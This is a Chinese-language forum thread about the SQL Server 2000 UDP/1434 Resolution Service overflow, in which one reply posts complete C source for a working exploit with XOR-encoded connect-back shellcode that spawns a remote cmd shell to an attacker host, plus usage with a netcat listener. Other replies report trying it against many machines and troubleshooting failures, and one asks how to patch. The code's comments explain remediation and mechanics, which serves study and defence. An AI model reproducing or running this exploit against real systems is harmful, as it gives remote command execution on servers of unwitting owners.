作者: wust [wust]
MSSQL2000 UDP remote 溢出漏洞有没有解决方案?我给系统打了sp3,sp4,还是不行,请高手帮忙! |
地主 发表时间: 11/28 17:31 |
回复: aspuf [aspuf]
原来你也有这个烦恼啊:( 大家一起找吧:( 你是做什么的? 交个朋友啊? OICQ:78707521 |
B1层 发表时间: 11/28 17:47 |
回复: olo [olo]
到微软中国去看看吧?具体的 我也不知道! |
B2层 发表时间: 11/28 18:50 |
回复: wust [wust]
找到一个SQL Server 2000 Service Pack 1 Chinese (Simplified) Version 不知道这个有没有用,是June 15, 2001发布的,谁有MSSQL2000 UDP remote 的详细资料,这个漏洞是什么时候出来的? |
B3层 发表时间: 11/28 19:00 |
回复: tabris17 [tabris17]
在绿盟也看到过这问题 最近好像很多人关心嘛 |
B4层 发表时间: 11/28 20:18 |
回复: syshunter [syshunter]
今天早上测试了23台机器,晕,没一个成功,和我作对。 |
B5层 发表时间: 11/29 10:12 |
回复: firewood [firewood]
/*
 * Proof-of-concept for the SQL Server 2000 Resolution Service stack
 * overflow on UDP/1434.  The port, the 0x04 packet type and the
 * sqlsort.dll addresses used below are those of the bug fixed by
 * MS02-039 (CVE-2002-0649), later mass-exploited by the Slammer worm;
 * the thread itself only calls it the "MSSQL2000 UDP remote overflow".
 *
 * Remediation is SQL Server 2000 SP3 (or the MS02-039 hotfix) plus
 * filtering 1434/udp at the perimeter.  Every address in this file is
 * build-specific (SP0 / SP1 / SP2), so a patched instance simply does
 * not overflow — the "no success" reports further down the thread are
 * the expected result against a patched or non-Windows host.  If a host
 * still overflows after "patching", the instance answering on 1434/udp
 * is probably not the one that was patched.
 *
 * Modes (see the usage text in main):
 *   tool Target                      send the 0x02 probe, print the reply
 *   tool Target NCHost NCPort SQLSP  send the overflow; the shellcode
 *                                    connects back to NCHost:NCPort
 *
 * Win32 only: <winsock.h> and an MSVC #pragma comment(lib, ...).
 */
#include <stdio.h>
#include <winsock.h>
#pragma comment (lib,"Ws2_32")
/* NOTE(review): strncpy/strcpy/strcat/memcpy/strlen, atoi and isalpha are
 * used without <string.h>, <stdlib.h> or <ctype.h>; presumably they come
 * in transitively through the Windows headers. */

int GainControlOfSQL(void);
int StartWinsock(void);

struct sockaddr_in c_sa;   /* unused */
struct sockaddr_in s_sa;   /* target address: filled by StartWinsock(), port set in GainControlOfSQL() */
struct hostent *he;        /* resolution result for host */
SOCKET sock;               /* unused */
unsigned long addr;        /* numeric form of host when it is given as an IP */
int SQLUDPPort=1434;       /* SQL Server Resolution Service port */
char host[256]="";         /* target, from argv[1] (at most 100 bytes are copied) */
char request[4000]="\x04"; /* outgoing datagram: byte 0 is the 0x04 packet type, the rest is appended in main() */
char ping[8]="\x02";       /* 0x02 datagram sent on its own in probe mode (argc == 2) */

/*
 * Connect-back shellcode, 361 bytes, no 0x00 byte anywhere (it is sent
 * with strlen(), see GainControlOfSQL()).
 *
 *  - bytes 3..12: two `push imm32` of sqlsort.dll import-table entries,
 *    0x42AE1018 and 0x42AE101C.  main() patches exploit_code[9] (the low
 *    byte of the second immediate) to 0x10 for an SP0 target, where the
 *    GetProcAddress import sits at 0x42AE1010 instead of 0x42AE101C.
 *  - bytes 142..145: placeholder connect-back IP 0x7F010101 (127.1.1.1),
 *    overwritten in main() with inet_addr(NCHost).
 *  - bytes 160..161: placeholder port, stored as the operand of
 *    `mov ax,0xFFFF / xor ax,imm16`, i.e. htons(port) ^ 0xFFFF (0xCAFF =
 *    port 53, matching the usage example).  The XOR keeps 0x00 out of the
 *    payload; main() stores the real port the same way.
 *  - the `xor ecx,ecx / mov cl,0x44 / mov dl,0x58 / xor [ebx],dl / sub
 *    ebx,1 / loop` sequence near the start XOR-decodes the last 0x44 (68)
 *    bytes with 0x58.  Decoded, they read "ws2_32.dll", "kernel32.dll",
 *    "WSASocketA", "connect", "CreateProcessA", "cmd": the code loads the
 *    two DLLs, resolves those imports, connects to NCHost:NCPort and
 *    spawns cmd via CreateProcessA (presumably with the socket as its
 *    standard handles — not verified here), then builds the string
 *    "ExitThread" on the stack and calls it.
 */
char exploit_code[]=
"\x55\x8B\xEC\x68\x18\x10\xAE\x42\x68\x1C"
"\x10\xAE\x42\xEB\x03\x5B\xEB\x05\xE8\xF8"
"\xFF\xFF\xFF\xBE\xFF\xFF\xFF\xFF\x81\xF6"
"\xAE\xFE\xFF\xFF\x03\xDE\x90\x90\x90\x90"
"\x90\x33\xC9\xB1\x44\xB2\x58\x30\x13\x83"
"\xEB\x01\xE2\xF9\x43\x53\x8B\x75\xFC\xFF"
"\x16\x50\x33\xC0\xB0\x0C\x03\xD8\x53\xFF"
"\x16\x50\x33\xC0\xB0\x10\x03\xD8\x53\x8B"
"\x45\xF4\x50\x8B\x75\xF8\xFF\x16\x50\x33"
"\xC0\xB0\x0C\x03\xD8\x53\x8B\x45\xF4\x50"
"\xFF\x16\x50\x33\xC0\xB0\x08\x03\xD8\x53"
"\x8B\x45\xF0\x50\xFF\x16\x50\x33\xC0\xB0"
"\x10\x03\xD8\x53\x33\xC0\x33\xC9\x66\xB9"
"\x04\x01\x50\xE2\xFD\x89\x45\xDC\x89\x45"
"\xD8\xBF\x7F\x01\x01\x01\x89\x7D\xD4\x40"
"\x40\x89\x45\xD0\x66\xB8\xFF\xFF\x66\x35"
"\xFF\xCA\x66\x89\x45\xD2\x6A\x01\x6A\x02"
"\x8B\x75\xEC\xFF\xD6\x89\x45\xEC\x6A\x10"
"\x8D\x75\xD0\x56\x8B\x5D\xEC\x53\x8B\x45"
"\xE8\xFF\xD0\x83\xC0\x44\x89\x85\x58\xFF"
"\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45"
"\x84\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98"
"\x8D\xBD\x48\xFF\xFF\xFF\x57\x8D\xBD\x58"
"\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83"
"\xC0\x01\x50\x83\xE8\x01\x50\x50\x8B\x5D"
"\xE0\x53\x50\x8B\x45\xE4\xFF\xD0\x33\xC0"
"\x50\xC6\x04\x24\x61\xC6\x44\x24\x01\x64"
"\x68\x54\x68\x72\x65\x68\x45\x78\x69\x74"
"\x54\x8B\x45\xF0\x50\x8B\x45\xF8\xFF\x10"
"\xFF\xD0\x90\x2F\x2B\x6A\x07\x6B\x6A\x76"
"\x3C\x34\x34\x58\x58\x33\x3D\x2A\x36\x3D"
"\x34\x6B\x6A\x76\x3C\x34\x34\x58\x58\x58"
"\x58\x0F\x0B\x19\x0B\x37\x3B\x33\x3D\x2C"
"\x19\x58\x58\x3B\x37\x36\x36\x3D\x3B\x2C"
"\x58\x1B\x2A\x3D\x39\x2C\x3D\x08\x2A\x37"
"\x3B\x3D\x2B\x2B\x19\x58\x58\x3B\x35\x3C"
"\x58";

/*
 * Entry point.
 *   argc == 2: probe mode — send the single 0x02 byte and print the reply.
 *   argc == 5: exploit mode — Target NCHost NCPort SQLSP ('0' selects the
 *              SP0 GetProcAddress slot, anything else SP1/SP2).
 * Builds the datagram in the global `request`:
 *   0x04 | 96 filler bytes | 0x42B0C9DC (jmp esp in sqlsort.dll)
 *   | jmp +0x0E and 6 junk bytes | 2 x 0x42AE7001 (writable .data in
 *   sqlsort.dll, skipped by the jmp) | 8 nops | patched shellcode
 * Returns 0 on every path; failures are only printed.  NCHost/NCPort are
 * not validated (inet_addr() failure and atoi() garbage go straight into
 * the shellcode).
 */
int main(int argc, char *argv[])
{
    unsigned int ErrorLevel=0,len=0,c =0;   /* len, c unused */
    int count = 0;                           /* unused */
    char sc[300]="";                         /* unused */
    char ipaddress[40]="";                   /* NCHost text, at most 36 bytes copied */
    unsigned short port = 0;                 /* NCPort */
    unsigned int ip = 0;                     /* NCHost in network byte order */
    char *ipt="";                            /* byte view of ip */
    char buffer[400]="";                     /* working copy of exploit_code with IP/port patched */
    unsigned short prt=0;                    /* htons(port) ^ 0xFFFF */
    char *prtt="";                           /* byte view of prt */

    if(argc != 2 && argc != 5) {
        printf("SQL Server UDP Buffer Overflow \r\n\n");
        printf("Usage:\r\n");
        printf(" %s Target [<NCHost> <NCPort> <SQLSP>]\r\n\n", argv[0]);
        printf("Exemple:\r\n");   /* sic: runtime string left as is */
        printf("Target is MSSQL SP 0:\r\n");
        printf(" C:\\>nc -l -p 53\r\n");
        printf(" C:\\>%s db.target.com 202.202.202.202 53 0\r\n",argv[0]);
        printf("Target is MSSQL SP 1 or 2:\r\n");
        printf(" c:\\>%s db.target.com 202.202.202.202\r\n\n", argv[0]);
        return 0;
    }

    /* host[] is 256 bytes and zero-initialised, so the 100-byte limit
     * always leaves it NUL-terminated; likewise ipaddress (40/36). */
    strncpy(host, argv[1], 100);

    if(argc == 5) {
        strncpy(ipaddress, argv[2], 36);
        port = atoi(argv[3]);
        /* SQL Server 2000 service-pack level.  The import entry for
         * GetProcAddress in sqlsort.dll is at 0x42ae1010 on SP0 but at
         * 0x42ae101C on SP1 and SP2; exploit_code[9] is the low byte of
         * that address inside the shellcode's second push. */
        if(argv[4][0] == 0x30) {   /* '0' */
            printf("MSSQL SP 0. GetProcAddress @0x42ae1010\r\n");
            exploit_code[9]=0x10;
        } else {
            printf("MSSQL SP 1 or 2. GetProcAddress @0x42ae101C\r\n");
        }
    }

    /* StartWinsock() also does the name/address resolution, so this
     * message is printed for a resolution failure too (see its notes). */
    ErrorLevel = StartWinsock();
    if(ErrorLevel==0) {
        printf("Starting Winsock Error.\r\n");
        return 0;
    }

    /* Probe mode: replace the 0x04 with the 0x02 ping and send just that. */
    if(argc == 2) {
        strcpy(request,ping);
        GainControlOfSQL();
        return 0;
    }

    strcpy(buffer,exploit_code);

    /* Patch the connect-back IP (placeholder 127.1.1.1 at 142..145);
     * this should be the attacker's own address.  inet_addr() returning
     * INADDR_NONE is not detected. */
    ip = inet_addr(ipaddress);
    ipt = (char*)&ip;
    buffer[142]=ipt[0];
    buffer[143]=ipt[1];
    buffer[144]=ipt[2];
    buffer[145]=ipt[3];

    /* Patch the TCP port netcat listens on (e.g. nc -l -p 80).  Stored
     * complemented, because the shellcode recovers it with
     * `mov ax,0xFFFF / xor ax,imm16` and the payload must stay NUL-free. */
    prt = htons(port);
    prt = prt ^ 0xFFFF;
    prtt = (char *) &prt;
    buffer[160]=prtt[0];
    buffer[161]=prtt[1];

    /* 96 bytes of filler (24 letters x 4) to reach the saved return address. */
    strcat(request,"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXX");

    /* Overwrite the saved return address on the stack with the address
     * of a jmp esp instruction in sqlsort.dll. */
    strcat(request,"\xDC\xC9\xB0\x42"); // 0x42B0C9DC

    /* Near jump: EB 0E skips the 6 junk bytes plus the two 4-byte
     * addresses below (14 = 0x0E bytes) and lands on the nops. */
    strcat(request,"\xEB\x0E\x41\x42\x43\x44\x45\x46");

    /* These must be writable addresses or SQL Server crashes before the
     * overrun can be exploited.  Rather than guessing a stack address,
     * an address in the .data segment of sqlsort.dll is used, since
     * sqlsort is already relied on for the return address.
     * First slot: SQL 2000 with no service pack. */
    strcat(request,"\x01\x70\xAE\x42");
    /* Second slot: SQL 2000 Service Pack 2. */
    strcat(request,"\x01\x70\xAE\x42");

    /* A few nops as the landing zone for the jmp above. */
    strcat(request,"\x90\x90\x90\x90\x90\x90\x90\x90");

    /* Tack the patched shellcode onto the end of the request and fire it. */
    strcat(request,buffer);
    GainControlOfSQL();
    return 0;
}

/*
 * Initialise Winsock 2.0 and resolve the global `host` into s_sa.
 * Returns 1 on success, 0 on any failure: WSAStartup error, version
 * mismatch, or resolution failure.
 *
 * NOTE(review): a host that does not start with a letter is treated as
 * numeric and then passed to gethostbyaddr() — a *reverse* lookup — so a
 * target IP with no PTR record makes this return 0 and main() prints
 * "Starting Winsock Error" although Winsock is fine; inet_addr() alone
 * would do.  isalpha() is also called on a plain (possibly signed) char,
 * which is undefined for bytes >= 0x80; cast to unsigned char.
 * The INADDR_ANY store into s_sa.sin_addr is dead — memcpy() overwrites it.
 * Defined as StartWinsock() while the prototype says (void).
 */
int StartWinsock()
{
    int err=0;
    WORD wVersionRequested;
    WSADATA wsaData;

    wVersionRequested = MAKEWORD( 2, 0 );
    err = WSAStartup( wVersionRequested, &wsaData );
    if ( err != 0 ) {
        return 0;
    }
    if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 ) {
        WSACleanup( );
        return 0;
    }

    if (isalpha(host[0])) {
        he = gethostbyname(host);
    } else {
        addr = inet_addr(host);
        he = gethostbyaddr((char *)&addr, sizeof(struct in_addr),AF_INET);
    }
    if (he == NULL) {
        return 0;
    }

    s_sa.sin_addr.s_addr=INADDR_ANY;
    s_sa.sin_family=AF_INET;
    memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
    return 1;
}

/*
 * Send whatever is currently in the global `request` to host:1434/udp
 * and print any reply (NUL bytes shown as spaces).
 *
 *  - The socket is bound to local UDP port 53, hard-coded.  bind() fails
 *    with "bind error" whenever something else on the box already owns
 *    53/udp (a local DNS service, for instance) — this is the error
 *    reported later in the thread.
 *  - SO_RCVTIMEO is in milliseconds on Windows, so recv() gives up after
 *    2 s; a target that overflowed (or a filtered port) produces no reply.
 *  - send() uses strlen(request): the payload must not contain 0x00,
 *    which is why the shellcode XOR-encodes its port and string table.
 *  - Returns 0 on the normal path, but the early error paths return
 *    printf()'s character count (non-zero).  main() ignores the result.
 *  - "sock erron" is a typo in the original runtime string, left as is.
 */
int GainControlOfSQL(void)
{
    /* Leftover declarations from the original, all commented out there:
     * SOCKET c_sock; char *ptr; char *foo; struct sockaddr_in srv_addr;
     * LPSERVENT srv_info; LPHOSTENT host_info; */
    char resp[600]="";                        /* reply buffer; recv() limited to 596 */
    int snd=0,rcv=0,count=0, var=0;           /* var unused; snd never checked */
    unsigned int ttlbytes=0;                  /* unused */
    unsigned int to=2000;                     /* receive timeout, ms */
    struct sockaddr_in cli_addr;              /* local bind address, 0.0.0.0:53 */
    SOCKET cli_sock;

    cli_sock=socket(AF_INET,SOCK_DGRAM,0);
    if (cli_sock==INVALID_SOCKET) {
        return printf("sock erron\r\n");
    }

    cli_addr.sin_family=AF_INET;
    cli_addr.sin_addr.s_addr=INADDR_ANY;
    cli_addr.sin_port=htons((unsigned short)53);
    setsockopt(cli_sock,SOL_SOCKET,SO_RCVTIMEO,(char *)&to,sizeof(unsigned int));
    if(bind(cli_sock,(LPSOCKADDR)&cli_addr,sizeof(cli_addr))==SOCKET_ERROR) {
        return printf("bind error");
    }

    /* s_sa.sin_addr was filled by StartWinsock(); only the port is set here.
     * connect() on a UDP socket just fixes the peer for send()/recv(). */
    s_sa.sin_port=htons((unsigned short)SQLUDPPort);
    if (connect(cli_sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR) {
        return printf("Connect error");
    } else {
        snd=send(cli_sock, request , strlen (request) , 0);
        printf("Packet sent!\r\n");
        printf("If you don't have a shell it didn't work.\r\n");
        rcv = recv(cli_sock,resp,596,0);
        if(rcv > 1) {
            /* Replace embedded NULs so the whole reply prints with %s. */
            while(count < rcv) {
                if(resp[count]==0x00) resp[count]=0x20;
                count++;
            }
            printf("%s",resp);
        }
    }
    closesocket(cli_sock);
    return 0;
}
B6层 发表时间: 11/29 11:52 |
回复: wust [wust]
我试了几台机子,每次都成功。这个和网速有关,网速慢会溢出得慢一些 |
B7层 发表时间: 11/29 16:02 |
回复: andychang [andychang]
高手 |
B8层 发表时间: 11/29 18:27 |
回复: wust [wust]
对了,这还和对方的机子有关,如果不是win2000,你也不会成功,unix(linux)搞不定 |
B9层 发表时间: 11/29 20:01 |
回复: kuaidao [k1]
为什么我还没成功啊。。。提示 “If you don't have a shell it didn't work.” 。。好久没成果了 |
B10层 发表时间: 12/07 00:49 |
回复: chenaxiu [chenaxiu]
呵,我使啦,没效果。。。。。 |
B11层 发表时间: 12/07 00:55 |
回复: wust [wust]
MSSQL SP 0. GetProcAddress @0x42ae1010 bind error 这是什么原因? |
B12层 发表时间: 12/16 17:33 |
回复: merlin [merlin]
怎么补? 我的服务器上试了,也溢出! |
B13层 发表时间: 12/18 17:45 |
回复: wust [wust]
为什么不能用了?sql2 打上补丁,mssql-sp2 |
B14层 发表时间: 12/19 18:22 |
回复: hcz [hcz]
在那里有介绍的,给个地址 |
B15层 发表时间: 07/05 01:03 |
回复: hcz [hcz]
英文的看不懂啊,sql2怎么用啊 |
B16层 发表时间: 07/05 19:57 |